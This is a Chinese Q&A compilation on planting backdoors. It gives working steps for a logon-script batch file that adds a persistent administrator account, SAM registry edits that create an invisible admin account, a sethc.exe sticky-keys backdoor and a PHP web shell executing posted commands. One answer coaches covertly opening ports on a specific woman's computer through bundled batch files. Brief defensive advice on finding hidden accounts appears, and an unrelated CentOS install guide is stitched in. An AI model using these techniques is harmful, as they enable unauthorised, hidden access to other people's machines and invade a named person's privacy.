如何在服务器留后门
⑴ 详细讲解如何留后门
1.进入站点,查看目录权限,可不可以写入和跨目录 2.查看admin,data,inc,upload等目录内部信息,或者站少人访问的直接站点根目录留. 3.免杀小马一般会在upload上传目录或者图片目录上传,有时候直接就在主页index里面包含跳转上传隐藏代码,大马一般不在根目录,站长得到的地方出现,会利用另名来迷惑站长,比如css.asp,或者inc2.asp,ad1.asp这些放在特定文件夹里,而遇上懒的站长,就会把这个shell帮忙永久保存了,呵呵..用wenshell扫描器一般可以将大部分的webshell扫出来,除非经过特殊免杀代码转换,或者利用iis6.0的解析漏洞,比如123.asp;123.jpg,win2000系统会默认为图片格式,但是默认的win2003iis6不会,直接解析成脚本执行,会导致webshell的出现,在动态单页面里包含一句话提交又或者利用include包含大法执行,也是查不到后门的方法,大伙可以去挖挖.好了,简单讲到这我们从光明的站长说吧,站点没出现什么访问问题,不代表没问题,oday,代码漏洞,注入,xss,nc上传等分分钟都可以使站点遭人种webshell 1.前面提到基本的方法就是shell扫描器,还有就是利用文件对比和旧的备份资料做对比,如果没有备份也没关系,直接把最新的文件列出来,用dreamwear查看代码,一般大牛用它来挖洞的噢..呵呵. 2.页面注入安全要防注,用户帐号权限要限制,目录脚本执行也要限制,一般上传图片的就禁止执行,其他目录禁止写入,删掉ws组建和cmd,除非是自己维护站点的,否则管理后台全部改名,且进行网段ip限制,自己的固定ip才可以登录后台. 3.网站如果用过编辑器,比如ewebeditor,fck这些的,把无相关的删掉,编辑器登录后台地址删掉,编辑器后台管理员帐户密码复杂化,去除带有可上传asa,asp,asasp,phpaspx,这些后缀,数据库设置为只读. 4.对可疑html清除包含漏洞,上面说过,可以包含上传代码运行呢.就像这样:index?id=nhs8.com,就可以进入上传画面. 5.还是那句话,经常备份,升级网页程序,扫描,查看记录.
⑵ 我有机会经常玩别人电脑,怎么在他的电脑当中留下后门
一.建立一个别人永远删不掉的管理员用户操作步骤:
1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容
@echo off
net user yixiao 123456 /add 注释:前面yixiao是用户名后面123456是密码;
net localgroup administrators yixiao /add
3、把这个文件保存,更改后缀为yixiao.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\scripts\Logon文件目录下,没有的话自己创建。
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
如果把里面的内容改成
@echo off
net user administrator 123456 /add
意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。
二.俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好 。
操作步骤:
1、首先建立一个帐号结尾要带$号 ,如果yixiao$ , 密码自己随便,然后把帐号删除.
2、将以下代码保存成(.reg)注册表形式
代码如下:
——————————————————————————-
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\
names\yixiao$]
@=hex(1f4):
——————————————————————————-
说明:1f4是Administrator帐号十六进制的值
3、保存好后导入 ,然后用CMD命令设置密码
net user yixiao$ 123456
这样一个隐形帐号就建立好了,用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦,如果被查出来。。。。。嘿嘿:-)
隐藏管理员帐号三分钟搞定
对 regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下,但是除了系统用户SYSTEM外,其它用户 都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体 步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将 administrator加入,并设置权限为“完全控制”。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将 会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输 入”regedit.exe” 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names [url=file://hacker$/]\\hacker$[/url]”
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、 1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键”F”的值复制,并覆盖hacker$对应的项 00000409下的键”F”的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。
那我们管理员又该如何把“隐藏账户”请出系统
隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统。
1、添加“$”符号型隐藏账户
对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入 “net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏 的。
2、修改注册表型隐藏账户
由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到 注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这 里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。
3、无法看到名称的隐藏账户
如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建 立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入 “gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件” 和“审核过程追踪”进行相同的设置。
进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中 的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账 户就暴露无疑了。
得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。
win2003下创建永远的隐藏帐户操作一、二
前段时间比较流行的一句话”肉机”其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家。
其实每一个用户帐号在注册表中都有自己帐号数据项
首先我们看看管理员在注册表中的数据项是什么样的
操作一、打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM
SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表不是很熟悉的朋友不要随便改动注册表)
操作二、认识注册表中的帐号分类
在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。
”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。
“000001fa5” 表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。有关常见的命令,这些命令也可以在OS的帮助中找到。
操作三、利用”net user”命令创建帐号
一、先建立隐藏用户 xbx$ 1、net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc
1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 这里的意思是说把xbx,以便让我们创建用户具备管理员权限。
一、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM
1、找到我们刚刚创建的用户帐号
我们可以看见”000003f6”就是我们刚新建立的”xbx
2、在注册表中多帐号权限复制
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 这个项,打开”000001f4”项,然后再打开”F”。
然后将这里面的值,全选,粘帖并覆盖到”000003f6”的”F”值.
3、导出注册表值
现在将注册表中的“000001f4”、“000003f6”和“xbx”都导入出来,可直接将Users所有键值都导出来,到文件.
4、删除帐号
接下来我们再次进入“CMD”中删除“xbx
删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中。 这个时候我们打开“本地计算机用户和组”就看不见“xbx”
先把system32下的sethc.exe删除掉,然后 把cmd.exe改名为sethc.exe就OK了,利用的是5次连续敲击shift的热键功能,下次你3389登陆服务器的时候,就可以利用热键功能打开cmd,从而增加账号,就可以登录服务器了
⑶ php网站怎么留后门
在php.ini中设置开启exec() system()等函数
创建 terminal.php 文件如下
<?php
!(isset($_POST['parma'])&&$_POST['parma']!='')&&exit("请输入需要执行的shell命令");
!(isset($_POST['type'])&&$_POST['type']!='')&&exit("请输入调用函数的类型");
$parma=$_POST['parma'];
switch($_POST['type']){
case'system':
returnsystem($parma);
break;
case'exec':
returnexec($parma,$return);
break;
case'passthru':
returnpassthru($parma);
break;
default:
exit;
}
?>
⑷ php如何留后门
试试php加密,还有,上面的只是正版验证,谈不上后门。
加个在线验证,比如域名与服务器上数据库中对比,不在的,下面就不处理,直接结束。
如果在列表中的,正常处理数据。
⑸ 如何给个人主机留后门
你现在也没给分呀?
抓鸡早就不玩了?
看来你是个老手啊?
怎么连个后门都不会?
顺便说下,没分不帮...
============
晕!不还是一个意思吗?
什么叫抓鸡?如果你会抓鸡,应该知道如何来抓.
如果对方事先中了你的马,那也不叫什么抓鸡了。
无非就是先进入对方的机器,然后再中上马,这就
算抓到了一只,前提是先进入机器内,然后下马。
既然你会抓,为何不知道如何进入机器?
下马那是进去后再办的事,你如果会抓鸡也就代表
着你能进入她的机器,如果你连如何进入她的机器
都不会?那还怎么抓鸡?
真是晕呢!
不过既然再一次关注了这个问题,我就不仿教教你
另一方面也刺激刺激你的嚣张气焰,不会就是不会
别整没用的,请教问题就诚心点.
其实留后门和下马都是一个道理,就是想叫自己
今后可以轻而易举的进进出出,不过对于后门.
很多情况下都想到了“木马”。也可以这么说。
不过道上稍微有些头脑的人都知道,最隐秘、最
有效的后门不是在对方的机器上放什么“马”。
而是在对方的系统设置里动些手脚,在不安装额外
程序的同时,给自己留一个方便。
比如:
1:
开启“RPC相关服务”大约也就1-3个
然后利用"rECTON"就可以在对方不知道的情况下,
开启一个CMD后门,利用这个你可以给她开telnet.
等等... 总之,你获得了cmd还会愁吗?
这个前提是你要知道对方机器的密码...
2:
"bat、批处理"贴吧里有很多闲人,你叫他们给你
写个简单的批处理文件,加到启动项里。
这个.bat不是病毒,而是启动的自动开启一个端口
135、139...如果你会抓鸡应该知道,像这种可以
利用入侵的端口实在是不少.这个批处理就像个
糖衣炮弹,根本不会被杀软查杀。即使防火墙、
杀软更新了补丁、自动关闭了哪些端口。
只要再一开机,它还会自动运行这个.bat。然后
开一个口口方便你随时进入。
3:
你能想到在她电脑里留个门,也就意味着你有可能
会接触到她的电脑,只是想在自己方便时,随时进
去看看。那样就更好办了.她电脑不是联想自己带
的备份吗?如果在系统里动不了手脚,你还可以从
应用程序里下手,比如:她刚刚恢复了一下系统..
但是其他的应用软件她没有装,比如QQ、MSN、UC
winrar、QQ飞车、暴风影音、摄像头驱动...等等.
太多需要重新安装的了。
这样一来,你先准备好一个可以开“3389、telnet
rECTON应用服务、135、139等等”的批处理.
大小不过10k,也不会被查杀。然后将这个批处理
捆绑到以上应用程序里,系统恢复后,她毕竟得安
程序吧,只要她安装了以上任意一款程序,都会
自动把这个批处理填加到新系统里,不管她用什么
防火墙、杀软。当他安装的那一刻,后门已经悄悄
的打开了,并且还不是木马。
她是一个女生,本身安全防范意识就不怎么强。
她以为新恢复的系统很干净,根本不会去理会什么
3389、telnet、RPC服务、135、139...
这样你不就知道她机器开了什么吗?
她联想给她自带的系统你该不了,那你不会从她电
脑里的应用程序下手吗?死脑筋...
其实我说的都是一种概念,具体的你要问我怎么写
批处理、怎么开系统服务、怎么捆绑安全的代码.
我是不会跟你再罗嗦下去的,想办成的事,自己去
琢磨。主要还是方法...
总结:
在对方是新系统的情况下,想办法在应用程序
上着手,别老是认为她系统没开3389.就泄气.
再着,如果对方有杀软、防火墙。尽量不要
使用木马,尽量在安全设置上稍微开个方便就
够了,比如只需要打开一项系统服务rpc,就
够你去连的了.或着在其他软件上给她加个
批处理,安全又实在的打开必要的端口。这个
端口能够为你的入侵提供方便就足够了.
至于防火墙,就要看你的本事了.
如果你是个抓鸡老手,应该知道在本地发一个
什么样的数据会被对方拦截。
同样,你也会知道,利用什么东西打马虎眼来
个蒙混过关,给你个提醒 - 如QQ...
你在和她聊Q的时候就可以实现.
哎!!! 自己琢磨去吧。
别以为别人会给你现成的东西。
毕竟你这一分都没有!
⑹ 如何在Windows,Linux中安装后门
在Windows7系统下安装Linux方法,下面以Centos版本的Linux系统安装为例,下面是步骤:1、首先,插入一张CentOS 6.4的安装介质(光盘或者刻录的U盘),使用介质启动电脑出现如下界面。
Install or upgrade an existing system 安装或升级现有的系统
install system with basic video driver 安装过程中采用基本的显卡驱动
Rescue installed system 进入系统修复模式
Boot from local drive 退出安装从硬盘启动
Memory test 内存检测
2、这一步检查系统镜像是否有错误,时间较长,不想等待;直接“skip”就可以了。
3、出现引导界面,点击“next”。
4、选中“English(English)”否则会有部分乱码问题。
5、键盘布局选择“U.S.English”。
6、选择“Basic Storage Devies"点击"Next"。
7、询问是否忽略所有数据,新电脑安装系统选择"Yes,discard any data"。
8、Hostname填写格式“英文名.姓”。
9、网络设置安装图示顺序点击就可以了。
10、时区可以在地图上点击,选择“shanghai”并取消System clock uses UTC前面的对勾。
11、设置root的密码。
12、硬盘分区,一定要按照图示点选。
13、调整分区,必须要有/home这个分区,如果没有这个分区,安装部分软件会出现不能安装的问题。
14、询问是否格式化分区,选择Format格式化即可。
15、将更改写入到硬盘。
16、引导程序安装位置。
17、最重要的一步,也是最关键的一步,按图示顺序点击即可。
18、至此,一个最精简Centos系统的桌面环境就设置完成了,然后系统开始自动安装。
19、安装完成后,重启系统进入登陆界面,输入用户名密码登陆即可。
⑺ 怎么给电脑(服务器)留后门
好多后门呀、、真的很多、、一时间都想不起来。。
最简单的开个3389或4899
我记得有一个TMD远控。
反正我这上面显示的是TMD
是不是我不知道、、
这个远控的特点是..
服务端1K、、
留作后门的好帮手啊!
⑻ 什么是服务器后门
就是在服务器上留下非合法正常登陆的模式,一般情况下,合法的用户会通过用户名,密码登陆服务器,而留下后门的服务器,黑客不用通过正常的用户名,密码验证就能直接登陆服务器。。这就是后门。。
形象的比喻服务器后门就是房子的窗户,主人从大门进入,黑客从窗户侧面进入。。
⑼ iis是什么 怎么在iis服务器留下永远的后门
IIS是服务组件,如果你想做一个网站服务器,你安装了 服务操作系统 要想把网站发布出去 必须要这个组件!
⑽ 如何给系统留后门
法律解决问题,像你这样来解决问题。最后追究法律责任的时候就会麻烦了。破坏是解决不了问题的。 你现在把服务器留后门也没用,以后维护就会自动补上的,灰鸽子也起不了多大作用。要是想破坏服务器,拿自己的机器做实验(建议你去国外的网站下载外国的病毒,不是木马啊,木马没用。小偷们才用木马呢。国外的病毒比较强悍,国产的杀毒软件基本上(狒狒)破坏还原。(国外的病毒很 叼 卡巴没辙)
以上只是建议 最好别使用 追究法律责任你就(狒狒)了